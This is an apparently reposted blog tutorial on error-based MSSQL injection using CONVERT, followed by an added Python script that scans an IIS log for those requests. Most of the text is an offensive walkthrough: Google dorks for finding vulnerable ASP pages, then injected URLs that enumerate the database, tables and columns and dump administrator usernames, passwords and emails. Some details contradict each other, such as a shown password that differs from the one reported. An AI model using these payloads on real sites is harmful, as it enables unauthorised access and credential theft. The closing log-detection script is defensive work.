MSSQL injection, method of attack!
###########################
http://kingofdkingz99.blogspot.com/2011/09/mssql-injection-method-of-attack.html
1.1 Introduction
1.2 How to find a vulnerable page?
1.3 How to confirm that the site is vulnerable?
1.4 How to find the version / name of the DB?
1.5 How to discover the table names (table_name)?
1.6 How to discover the column names (column_name)?
1.7 How to get data from the tables that interest us (e.g. name, pass, email, etc.)?
1.8 Conclusion
[1.1 Introduction]
############
This lesson assumes you already know the different injection techniques and will try to explain MSSQL injection.
Here you will have the opportunity to learn how this method is commonly used to obtain information (name, password and login) or other data.
MSSQL injection targets products made by the well-known company Microsoft, so this type of injection concerns sites coded in ASP / ASPX etc.
There are several types of attack of this kind:
* - Normal MSSQL SQL injection attacks
* - MSSQL injection in web services (SOAP injection)
* - UNION-based MSSQL injection attack
* - ODBC error attack with "Convert"
* - MSSQL blind SQL injection attacks, etc.
The type of attack that will be written about here is:
"ODBC error message attack with Convert"
[1.2 How to find a vulnerable page?]
############################
Finding a vulnerable page is easy; this can be done with Google.
Let's open Google.
Type, for example:
inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
etc. (I have given a few examples; you can now use the same logic to build better dorks.)
[1.3 How to confirm that the site is vulnerable?]
##################################
This is very easy to check: add an apostrophe (single quote ') after the value of the page's ID parameter.
If the response we get back is an error page, the page is vulnerable. Typical error texts are, for example:
++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft OLE DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most common responses shown by pages that are vulnerable to MSSQL injection.
Here is an example of where to put the apostrophe (').
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100'
----------------------------------------------------------------------
The error displayed is:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This page is vulnerable!
[1.4 How to find the version / DB name?]
############################
An example makes this easier to understand.
Version:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))--
----------------------------------------------------------------------
The response we get looks like this:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (SM)' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Now let's find the database name (DB_Name):
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(DB_Name()))--
----------------------------------------------------------------------
e.g.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'EVILZONE_CREW_DB' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[1.5 How to discover the table names (table_name)]
######################################
Discovering, or simply finding, the tables of the database is done with this method.
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------
An error such as the following will now appear:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Users' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
That is, in this case the first table (table_name) is 'Users'. Now let's find the next table:
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
----------------------------------------------------------------------
The same kind of error message will appear, this time giving another table:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'news' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The second table in this case is 'news'.
Finding the third table (table_name) goes like this:
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
----------------------------------------------------------------------
The third table appears to us:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'categories' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the third table is 'categories', and so on until you find all the tables.
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','Categories')))--
----------------------------------------------------------------------
[1.6 How to discover the column names (column_name)]
###########################################
If you want the column names (column_name) of the table 'Users', go like this:
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Name' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the first column name for the table (table_name) 'Users' is 'name'.
Now find the other columns (column_name) of the same table 'Users':
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name')))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'password' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The second column name (column_name) is 'password'. Now let's find the next column_name:
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name','password')))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'emailaddress' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the third column_name is 'emailaddress', and so on until the end, to find all of the columns (column_name)!
[1.7 How to get the data that interests you (user name, pass, email, etc.)]
#####################################################
For this you do not need anything different from what we mentioned before.
In this section, all that needs to be done is to use the table (table_name) and the column names (column_name) found in the earlier results.
In this section we will use:
Table_name = Users
Column_name = user name, password, emailaddress
Substituting them into the earlier example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 name from Users))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Administrator' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
user name: Administrator
Now replace the first column "name" with the second column "password":
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value '123456' to data type int.
/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
password: administratorpassword123
Now, for the next column, it works the same as above:
For example:
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
----------------------------------------------------------------------
emailaddress: king.cyborg@yahoo.com
So we have now obtained some information from the page: the name / pass and emailaddress.
user name: Administrator
password: administratorpassword123
emailaddress: king.cyborg@yahoo.com
[1.8 Conclusion]
############
A summary of the requests used in this lesson:
======================================================================
www.localhost.com/news.asp?id=100'
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
----------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
======================================================================
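The requests this lesson walks through leave a recognisable trace in the web server log: repeated hits on the same .asp page whose query string carries convert(int, ...) around @@version, db_name() or a subquery on information_schema, usually answered with HTTP 500 because the conversion error propagates to the page. The following Python script is an added example, not code from the original post: it parses a constructed IIS W3C log excerpt (field names follow the IIS W3C extended format; the client IPs and timestamps are made up) and flags those requests per source address.

```python
"""Flag the CONVERT error-based MSSQL injection requests described in this
lesson inside an IIS W3C log.  Added example; the log excerpt below is
constructed, with made-up client IPs and timestamps."""
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C extended log excerpt (field list given by #Fields:).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-09-14 10:00:01 GET /news.asp id=100 198.51.100.7 200
2011-09-14 10:00:09 GET /news.asp id=100' 198.51.100.7 500
2011-09-14 10:00:21 GET /news.asp id=100+or+1=convert(int,(@@version))-- 198.51.100.7 500
2011-09-14 10:00:35 GET /news.asp id=100+or+1=convert(int%2C(select%20top%201%20table_name%20from%20information_schema.tables))-- 198.51.100.7 500
2011-09-14 10:01:02 GET /news.asp id=101 203.0.113.5 200
"""

# Shapes used in the lesson, matched against a normalised query string.
# List order only determines the order of names in the result.
SIGNALS = [
    ("convert_cast", re.compile(r"convert\s*\(\s*int\s*,")),
    ("version_leak", re.compile(r"@@version")),
    ("dbname_leak", re.compile(r"db_name\s*\(")),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)")),
    ("subquery", re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b")),
]


def normalise(query):
    """Decode %XX and '+', collapse whitespace and lower-case the query:
    the form a literal-match rule has to see to be reliable."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields: header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#") or fields is None:
            continue
        parts = raw.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip it rather than mis-assign fields
        yield dict(zip(fields, parts))


def classify(entry):
    """Return the signal names that fire for one entry ([] when benign)."""
    query = entry.get("cs-uri-query", "-")
    if query == "-":
        return []
    norm = normalise(query)
    hits = [name for name, rx in SIGNALS if rx.search(norm)]
    # The first step of the lesson: a bare apostrophe that makes the page
    # throw a server error.  No SQL keywords yet, so use the status code.
    if not hits and "'" in norm and entry.get("sc-status") == "500":
        hits.append("quote_probe_500")
    return hits


def scan(text):
    """Return (c-ip, cs-uri-query, signals) for every suspicious entry."""
    findings = []
    for entry in parse_w3c(text):
        hits = classify(entry)
        if hits:
            findings.append((entry["c-ip"], entry["cs-uri-query"], hits))
    return findings


def per_source(findings):
    """Count suspicious requests per client IP (input for alert thresholds)."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, query, hits in found:
        print(f"{ip:<15} {', '.join(hits):<38} {query}")
    print(per_source(found))
```

Decoding and whitespace-collapsing before matching matters: `+`, `%20` and `%2C` in the logged query string would all defeat a literal match on `convert(int,(select`.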